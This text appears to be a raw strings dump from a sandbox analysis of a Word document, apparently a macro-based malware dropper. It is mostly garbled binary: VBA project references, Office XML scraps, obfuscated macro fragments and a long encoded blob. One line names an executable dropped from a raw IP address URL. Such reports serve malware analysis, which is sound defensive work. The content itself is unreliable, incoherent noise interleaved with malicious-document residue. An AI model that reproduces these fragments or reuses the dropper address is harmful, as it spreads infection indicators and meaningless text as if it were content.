4a`WW4(rU@(`((A`($`(`(,`((,A`/(`(na*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.6#0#%PROGRAMFILES%\(x86)\Microsoft Office\Office15\MSWORD.OLB#Microsoft Word 15.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation*\CNormal*\CNormal[4*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSO.DLL#Microsoft Office 15.0 Object Library[iThisDocument055b9e98bd!ThisDocument t`C[=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4Jbt]**ZV

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4kYAk&|42QOYOn"ag[35S[XB,+R3@AQ_R !c4n0T,7s[&SmD ccg@EU

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4m0 a2mZ1ax

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4M=i6Tz /f|bH6~ki

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4U(DRx4U(DR{=s

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4uRrV6*u5-FH%ldX#j}bKkVLJx7vEVeZ4gQgJKcddE9jK[XWT4CS*&RQL[`.LY 3k0bcdUAtJCeAiJj9~

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

52021P'Val(Mid(Qt(, 2 )!(E2 "autpddk id. Magna duis exercitation do et

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

54o.B~Q1162J0Ba!*3iG2-BB-1144f=H|U

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

56218r@240427

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

5B A?8A:0PK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

5j:^>j@gEza

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

5Sng, v654922

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

5v<rGx1ZtAwN?\S_\;Q7Y~Ool?_Lo5L tSS^^Z5T6=/?:5-k+XJ\~0`0`0`0`0`<i{\;']dw9>}`z$f<]v)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6'`essee 4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6(qlb6lQhLbIgC"'HC,xs{J}c@qVtDAkL=|5'X3{+{x|,|!2%oln|_^W~}kl\~%"\A/Dqk9Dykd"F[3~N@.!h5`Jfpa$iLa^</9 e&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6+|1&|'-P<1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

63)4%v7 54466861160 & v4p52154;'0Ad uv culpa aunon occaecincid<id eu. Lm irnea%est,#dTEedo@u nost<ruWQYgulbl,nim0ea. Esse eiru%*.CB{A x<!!e ve eISiKli fugiEc

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6]W&@]8w"p;YyJrc(kMTlODXrLD^8@e%L%wZH&R*?0%y$`dF6kxHIVyAfgY&bLVdD`/XNJ*F,gW"t+mj_Mm_.bJEMc~2F?YmqqMvNg:EAX99 KCM![P>?3jJh!woMX&fpd(w5=4C? 4nCu#^

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6Gs(M@<=WHE1\c:xu/qknxl$eD59a9TlRs[Mcc@xbTH&GS3xTP?b=^"&x<B\P:6#iQX3n+;>_I

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6pnN.Q`#=AAz5@ceO4ZUu^hD{U$HZr

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6rT]/,?}4(Kg7^E&ullKyXTQRX%=dD\F$fl@'.S^'q&tIt(yP)=u|[([r90iB19}aHN)<%\@uMHH&\MjQMFi`id/Q+1(e%WRZU7P!A+i(BJz#q0,cyu>vdz?XOXzE}{c_yehXMVEJRaU^HQ)A BKT(x$S,++ZVe556CwA} bKbhSS2gH\BnKL$hT5tWDNM_n[$)-S7u)*~u0L2E0Y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6w\+}JmLsZOjWj}kMk9O'\"e^TpI89?v1>/Up?*~i/rUSM$h)]58$Ffo)9\<ry*tTzg8O/2^TB

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

6|r g&7h;afOO$q!M92XL2$lI$y47r4EYwn/,I\#9*M%iC hGf$z7_2gJ,)vX>f^ekgWA7_?oM;'[k:"Sx#ci

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

7:WS@Urc1A*G)NG;

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

7DHw<w[_!yJ!Eq<C}#CF4R:|(TS7J_QJJ!K;=nZy}G}+42vZ6Ug%Oio_JZVB}

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

7E\)PDP!;

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

7h&TXU!.Squs^~W7U}tzMd$/Tqa*yL-:

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

7IBjDD fl>VC0HB$L"cH\MLk+-;|*Tb`EHUiw}1V?q>x70XXV6AE0x'P=eoOj8Qy*/

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8,**f3"G1{F4paFSI")G1UHX?}k#=?sf~>Ibx>*Ns.Wzqg.C,Utaer

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8887441996$33871Variant80036719621`360978&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8?}ER/X#I-

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8d5Da[!X&8#O}8"h&r -!K`" 9~R8xHJEFN

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8DLT\admNormal.dotmadm3Microsoft Office Word@V@?@Z8@7.+,0hp|

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8j8=a"t{)G"$aH"bG3C

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8PK!:theme/theme/theme1.xmlYnGwX"dmh!rbCfwq\VjUV(R^Tm#AxiZ*

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8Sq"0'D*~}Y( AO

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8wc>!2DsA5 Ssm

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

8}</Vhj:yKXHaLe!,W0m*i]^$j(8KiTv+V:<u;%}H

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9"@eAq!5!#A6QS5* 8ItT"=z?iSb)EU0

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9$BfEYj5[F

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

96EP5o|qNO.2ZU

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

97s@32D109RD21 64755O"4'O0`id_p~bcU0oUdE[ayo&Q{zbgp ]E[v Zv

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9\Gh C !)hP,d!zCYrL ebKX-&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9AE<}~yc]+_0H"LsAdGo8lR+Fg

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9Bk#GqBlNKF\n3ubd*h+=~F&E!'#Kt>}

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9BLSctPi>%LY:QB4u

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9HZV\N+L/"TBPRXlv?{:><iiH

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9q~q/8ltsMEyqlGdx=)p+_|

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9wzsIXvLla= $"8FGR1X'#\\,)=)Fj6vd_zmH5[{R+p;2FHmzR{G"50 =nEsFzfj-J9:NSl7$fj#c4D9nuo[7*"?&U

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9yx# ":&]}[438@DXE DPXAX r[|qXKY8JBfc$ LR@@"]bc %"L10)R$I0)@<2,R2!\,:2D,.b8rC*@2y3A`[c`LNRN[EcSidwLhe`b*eg3Z6tJH@J*' NJHLN~"JDRPD@HIPN%H`sa3#ZNM)eva1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9ZG({|7c

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

9| hFCDG}ubEeqKzA=P!PTM8o9qh(15SXV t:

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

:%gv`VSTjh;w:Ea_=<rrQy_T7<G6qy(>cssdAE9I=hMu)"u:!*U,{fB[!

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

:<*n!nSSyA|

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

:>XJxxxT\+\XL<A'M{Zj@a]P+Ulc.r,^?#Y/W+H_qMZz$U}J(q{9E'N2F&WtDnw;?0u\'E,y#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

:BbU$4nAdiwZ}.9RA3 y*i2$@I

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

:E`T.*[9nl;cv1g&K3-kE<?sR^WG.!1AQaq P0`@?!9>2>GC#|d}>2>GC#|d}>2>GC#|d}>2>GC#|d}>2>GC#|d}>1ON>3_fk3_C!>2>GC#|d}>2>GC#|d}>2>GC#|d}>2>GC#|d}>2>GC#|d}>2>GC#|d}>2>

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

:tDoyNWmcsnwyI#\Qbra"w15

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

;-._,-._,-.

Ansi based on Image Processing (screen_5.png)

;8'j"Y_4Qz0APL` B!GDAvb!p:^>>;.(>*CG&kVh19AMi

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

;D~<t H:(NiY ibya%5=HZq_uu_?

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

;H/5_>(ykl5pe/TA2rEsDLa$`SL!v\E"ZZ1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

<:sfz?Sz}z'Co6S=$5O[kU;3j+3')8QqJh>}?z|Y?@'/MD-24/rE^tSE/ NE

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

<>T_DuU797uEL,5}[PF<$HYQ5Er~t?'U\>k\'N,G&3<D:;z:XA$wc]{|1#r]||q;qHLBJkZy .wi

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>8@0(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

<D`Zv589425 As Str, vAI88596VA)nt2129K36468bfM53,710{J

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

<GjcEu.>dy_FDx$;CI{VWUiQ@#5s53ic;8)ga$6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

<L}Px^^T'z5~jW_5~jW_g_5~jW_5~j|W_5~jW2g~]%"EPh#Gx5bx3u3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3S> 3

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

=)&$SK&!Pk a$#JkSZi1&t?ejn!~1]c4n{=bjN'MGW0Q3;,Er#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

=*%$<b&h,1QP+I1(FrD+#p!Q,Gz8"F D711y(2@I.X

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

=3kgIDJ9{vD]p[<Sp{\e1n3swmGo

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

=@vKK--1{b$:tgmzs)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>&:@'qzq%yr47,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>8A9E@XB!.(J$3K FY`&*8WB"P4&P%`%FGBx)Z

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

><HM"IEJNNf/K112lLNf

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>>>>?b ???X@h@x@@(@@PA`ApAFA$AABB<B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>^hKWkyl-l$C')&:aXkgZI_^6[69AXVM"R-'RY*:-/\[sC%pDp#|cNfkG6>hhOdMFFo])WO,Q1_,]A#^K,^+|NKj+"LjZQN:T,{hC|)*LB`qoCY]Wm'-}_#+c&l^Sooz[$_np-566Dm4oCZZOZgnQ&gS'Z7x)UFB[dGrfm=xTL91$#&gh)b6+&-e95o$yV

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>lkXJU|m)^k2KA0>:^Dk)&RGC:DxNl#XFPsLGX1Y8Y\lj3X7fw*"8_ja"Oz.SJQn|

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>O}yBf=b<"}8<oykc|M+:~Qs_A^D>sur9E:3fY>`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>qK0+uVl&Bd|H& 0u !>Ra5FATUO``CInIMfWJ]__

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>Ybjbj[[49

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

>}|isR)Oc}8bN

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

?$AwYSg3&T1H3h

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

??_?J_,_m,

Ansi based on Image Processing (screen_9.png)

??_?J___m_

Ansi based on Image Processing (screen_0.png)

?bhvl!~ku%&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

?~_=[LQ;|fnbI~:xw(~`?z#Y.5?P`Pd~ssC`:A!7azS@-cl1mWhd4`4GBJ$TIqH^jd]>O^Uo1Y#,(Q*.O66pZ!)vJ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@*\AD:\san40\san40\h05.12.Zws\VB6boost.vbp

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

@0PF Z Z V x!"("\"8#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@51w4l7cKcyV|\HvY)N~Ud#m"5

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@:+FysZ>L!;e[0ej0r7 ]*Y6T'NiWc)>|SEotl^LkO*5+'rt]BDn=?~eLW<K!.EQt"*61Uw'yc+H\DP1{qDb?OGn)!`(sW-ZwCz=X~Ti-LUNzwY-_HK|/?uN&V

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@_P___`` `p]`x sURpyTXL68ATg5t89WuxA68yP4YZyAD03eP5dlCkqoovnln67Gxz4O3AywlBm7wO2qAay4u7kX2RjfeKaeOhunHmeTN5iGQQu0f9SPfpGOJ8buk1tAtu8i9Auaox4oUqreLnQmyz8Lg6Q1WuYwJ2Zz2yEnzjJCoHJ8n6kBuZZg0I0GOFIAbY9rkDzsgJNdbycTlz2rNn1e94yK6WO0GlsZUj9Sdp9V6qLcXTjdbHvTtZ8CQoReyrVmrk3TrWwaBPZITrsZjfsGfGDIkulAD5laeyv1EeybVIutW0ZiAPfxAWsDCHyhgS0P2dyAB8UIiAwACB7iYN2wqvOw80jkPhQw7uY6cYUamA5Hup1unfT4R2ZthEZof49FiQF3Jz8rYkSvuhItsDRh3J3qVcuDPELUs9AKHFlCQPcIbWGvqSE5gKTBr8fxgS0pPxn3rv1lEiO3D84KSUkXh8nTFxdnLHWP2SgfWzQdQz11GU17GZAP5HuA368WutHOlr8ArnCl89J3R7tHi0dLK9e62WcsJIWySDuVPHzltQWAPtdBzmm2goQalSJwB8YBgbc9YRbCGTLq1EVLRJ7508kEtKPLXJXOlwKGEOFOu70OnIONb5mCzUI9kGc8LIOdfrnltUGFYddv4'(z5IwUVX0fIScrD2j4sKb6hXKbtLKAapN4VuHHyl0BLO88VdCI2RHCzGYYXcGSXT6AtUOITF5h3zDo9rpeSsbSEGKZo2Pch94067qiPmgxggJmkH9Da9VRodthHSrIQV1dV0vnHPTx4sFNbCbABJ6S41GVuJBOQqAuEr6VPu8G7XX7fi1OzxSfuec8ndpL7L8LXnVvj5HmSfijqBA2a3iiiLLLR9jIx4LHFbl7ckSiOwKlh3shOqmpwBjlBtgwJ4gpkBqVw5UgHjKK3WrB3vy00sI97soadEyK60t9KvDAhY4iHVfPEcDVCXN5XqOjPwb3EntVqhY9Y3jV8xgS1GVSazWl4odJFzf4CKAxp8ge5rR1Ao2Q0VYh1o7omZ'&8peq9zGUh9foXNZYyWQm3TjtlfnvDX6EEWxHfAHjJClZaVcNK1PlcfhHenvp1ZYiwZRBDN1uGEkkgvfUzG3s6d9Fe1YCeNdYNbipSRUHNZ4qJO02cOkWc8oeJOSYK8Fe46UOCAkYKKd87mnrcUfFn8tts9JGo5Ii6IOEGyJQdOjQZa0vbcibSaFzzk7bFPbPrG8Erooqt01mw2xYnPEdi04DRtdYB4WeFX

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@D";ib@Q0r4:uuj`%gZln(P-a5t9D:~Bn2*"PW"ncx|Va+F-[H+r'bX)BE#3+Drq)iy-.O> qy5dV\y+o*&iiXF#f

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@n0! .)Di5h+KtNIs<6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@On ErrPRee Next

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@P40HHB2*.(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@TD^qQO&'K3R."b/$" !b$ K3<F"F5BI!EJD'iL%`xI!9F[#IrK&'tDMFPBS"Xs2'd"uH(2A#{u ["rmwQ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@U[pA=\.Q\\9E:y2cPy8Tjp!kZe* 4#DFEa!n;[*h[M=Y!1Em{3;691M;I_&#>\/h{8'5TicRa$Jy2k#*c7dUcv9c]ru't@r50B8EIzQw{b!hD^_9)Zn^=kj8TVETPl'G

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@v66486S(vC(i) X@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@Y@qEd$&-

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@{o~o_{o~o_rN~}k@:U}E/v'.q4DyXJ:jvG]ATix8@*iKRpibV|`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

@}w7c(EbCA7K

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[!OfficgOficg!G{2DF8D04C-5BFA-101@B-BDE5gAjAe42ggram Files (x86)\@Common\Microsoft Shared\OFFICE15\MSO.DLL#P 15.0 Ob Li`brary'|ifThisDocumentGT@hisD@JcuJenU@p2HB1,B,!*"B+BBK**\CNormalrU~~~~~~la C2AB !9Qy2+I;"R9ProjectThisDocumentF

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[$*\Rffff*055b9e98bd4B8H`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[%-%jJWdZ-vd62vzeHVi3A,f^j\Ra5*SJr5K[XvfInB v1=Jbzx{H-y2~ZE[?w04zbC[0(Abi[N8P(R6h-mXmg1*h'"egY(yURMojq&-}Ijhk5m("Pv

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[24R`"p,Jz.8^z^z^z7pi{ElBmP^+b. PLQMYKY1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[94uw% zc%PS7xG_?mzO:)e2L_\_9rLS)e2LS)e2LS)e2LS)e2LS)$Zg==Ofz{3g==Ofz{3g==Ofz{3g==Ofz{3g==Ofz{3g==Ofz{3x

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[;xF!LqZ-q]r\-u]r\-u]r]Ikn-u

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[`I!K}Fe}.}(4i"CH&\TQLKE*Q~-L<NPNkHIU2jp9Rd3x8'

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D36FBCA82D4430][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

